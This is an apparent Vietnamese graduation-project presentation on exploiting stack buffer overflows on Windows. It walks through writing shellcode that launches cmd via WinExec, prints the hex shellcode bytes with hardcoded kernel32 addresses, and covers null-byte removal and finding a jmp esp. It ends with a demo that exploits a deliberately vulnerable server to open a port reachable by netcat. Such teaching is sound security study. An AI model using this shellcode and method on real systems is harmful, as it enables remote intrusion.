Báo cáo Tìm hiểu kỹ thuật tấn công thông qua lỗi tràn bộ đệm trên Window
Bạn đang xem tài liệu "Báo cáo Tìm hiểu kỹ thuật tấn công thông qua lỗi tràn bộ đệm trên Window", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Tài liệu đính kèm:
- bao_cao_tim_hieu_ky_thuat_tan_cong_thong_qua_loi_tran_bo_dem.pdf
Nội dung text: Báo cáo Tìm hiểu kỹ thuật tấn công thông qua lỗi tràn bộ đệm trên Window
- Trường Đại Học Dân Lập Hải Phòng Khoa Công Nghệ Thông Tin BÁO CÁO ĐỒ ÁN TỐT NGHIỆP Đề tài: Tìm hiểu kỹ thuật tấn công thông qua lỗi Tràn bộ đệm trên Window Giáo viên hướng dẫn: Th.S Đỗ Xuân Toàn Sinh viên: Nguyễn Đình Hồng
- Nội dung trình bày 1. Tổng quan về lỗi Tràn bộ đệm 2. Kỹ thuật tấn công lỗi Tràn bộ đệm trên window 3. Chương trình Demo 4. Kết luận
- Tổng quan về lỗi tràn bộ đệm 1.1.Tổ chức bộ nhớ cho các tiến trình - Bộ nhớ được phân chia thành 2: + user mode + kernel mode Mặc định, 2GB của không gian nhớ ảo được cung cấp cho user mode, vùng địa chỉ 0x00000000 - 0x7fffffff, và phần còn lại, 0x80000000 - 0xBfffffff được dành cho kernel mode.
- Tổng quan về lỗi tràn bộ đệm 1.2.Tổ chức bộ nhớ của một tiến trình - Không gian nhớ gồm %EBP 3 vùng: + vùng ngăn xếp + vùng dữ liệu %ESP + vùng mã lệnh Bộ nhớ của ngăn xếp sẽ lớn dần về phía cuối vùng nhớ khi có nhiều dữ liệu được đẩy vào.
- Tổng quan về lỗi tràn bộ đệm 1.3.Lỗi tràn bộ đệm Xét ví dụ: void fun(char *str){ buffer[126] ; //Cấp phát bộ nhớ cục bộ 126 bytes trên stack strcpy(buffer,str) ; //Sao chép đối số vào bộ đệm stack } Nếu ta gọi hàm: char *str="AAAAAA AAAAAAAA" ; //127 chữ A Một lỗi tràn bộ đệm sẽ xảy ra
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window 2.1 Khai thác lỗi tràn bộ đệm
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window 2.2 Cách xây dựng hàm chức năng khi tấn công (shellcode) - Bước 1: Chúng ta sẽ viết một chương trình, ví dụ viết chương trình để chạy CMD-Shell bằng Visual C: #include main() {char buf[4]; buf[0]='c'; buf[1]='m'; buf[2]='d'; buf[3]='\0'; WinExec(buf,SW_SHOW); exit(1);}
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window - Bước 2: dịch sang assembly (chạy debug -> disassembly) push ebp mov ebp,esp push ebx push esi push edi mov byte ptr [ebp-4],63h mov byte ptr [ebp-3],6Dh mov byte ptr [ebp-2],64h mov byte ptr [ebp-1],0 push 5 lea eax,[ebp-4] push eax call dword ptr [__imp__WinExec@8 (0042413c)] push 1 call exit (004010c0)
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window - Bước 3: Xác định địa chỉ của các hàm cần dùng trong dll của windows. Trong ví dụ: Chúng ta cần xác định 2 địa chỉ của hàm WinExec và ExitProcess. Địa chỉ của WinExec là địa chỉ của KERNEL + địa chỉ con trỏ của WinExec. WinExec = 0x7c800000 + 0x6114d = 0x7c86114d Địa chỉ của WinExec là địa chỉ của KERNEL + địa chỉ con trỏ của ExitProcess. ExitProcess = 0x7c800000 + 0x1caa2 = 0x7c81caa2 Lưu ý: Mỗi phiên bản Windows có 1 địa chỉ cho các dll cơ sở khác nhau
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window - Bước 4: Dịch sang mã máy Ta được shellcode như sau: "\x55\x89\xE5\x53\xC6\x45\xFC\x63\xC6\x45\xFD\x6D \xC6\x45\xFE\x64\xC6\x45\xFF\x00\x68\x05\x00\x00\x00 \x8D\x45\xFC\x50\xB8\x4D\x11\x86\x7C\xFF\xD0\x68\x01 \x00\x00\x00\xB8\xA2\xCA\x81\x7C\xFF\xD0"; Ta có thể dùng debug trong visual C hoặc dùng hex edit để đọc mã tác vụ
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window - Bước 5: Xử lý byte NULL Do các hàm xử lý chuỗi sẽ hoàn tất ngay khi gặp một ký tự null (\0), vì vậy shellcode phải không được chứa bất kỳ giá trị null nào. Ta sẽ sử dụng thủ thuật sau: Sửa đoạn mã assembly bằng cách đặt con trỏ ngăn xếp ESP trỏ đến vị trí của EBP. Sau đó, thực hiện XOR ESI (thực hiện XOR zero vào ESI) Ví dụ: push $0x00 Sẽ được thay thế tương đương bằng: xor eax, eax push eax
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window - Bước 6: Tìm bước nhảy Chúng ta dùng công cụ findjmp để tìm bước nhảy đến con trỏ ESP. cú pháp: findjmp kernel32.dll esp
- Kỹ thuật tấn công lỗi Tràn bộ đệm trên window - Bước 7: Gửi shellcode tới server thử nghiệm Begin Khởi tạo buffer chứa shellcode Khởi tạo socket để kết nối tới server Kết nối tới server ? Not ok ok Send buffer End
- Chương trình Demo Chúng ta sẽ viết một ứng dụng client/server không an toàn và sẽ thực hiện khai thác. 3.1 Chương trình server Trong ứng dụng server có 2 mảng ký tự được khai báo: “buf” và “Message”. Buf được cấp phát 2000 byte, trong khi Message được cấp phát 5000 byte. Khi nhận Message nó copy vào buf thông qua hàm pr (gây ra lỗi). void pr( char *str) { char buf[2000]=""; strcpy(buf,str); }
- Chương trình Demo 3.1 Chương trình server - Lắng nghe trên cổng do ta tự thiết lập 3.2 Chương trình client - Gửi một thông điệp tới server thông qua cổng 3.3 Chương trình tấn công - Gửi một shellcode tới server thực hiện mở cổng 9191 - Dùng netcat (nc) để kết nối tới server qua cổng 9191 và thực thi shellcode chạy CMD
- Kết Luận - Qua đề tài này, tìm hiểu được những lỗi tràn bộ đệm, cách khai thác lỗi tràn bộ đệm stack để tấn công một host từ xa. Từ đó rút ra được các kiến thức bao gồm các yêu cầu về bảo mật tối thiểu khi xây dựng một ứng dụng trên mạng. Biết các dò tìm những lỗi tràn bộ đệm stack trong các ứng dụng mạng và phương pháp tấn công vào các lỗi đó. - Hướng phát triển của đề tài: Xây dựng những chương trình dò lỗ hổng tràn bộ đệm của các ứng dụng trên mạng. Tìm những phương pháp để vá các lỗ hổng đó khi nó xuất hiện.
- Em xin Chân thành cảm ơn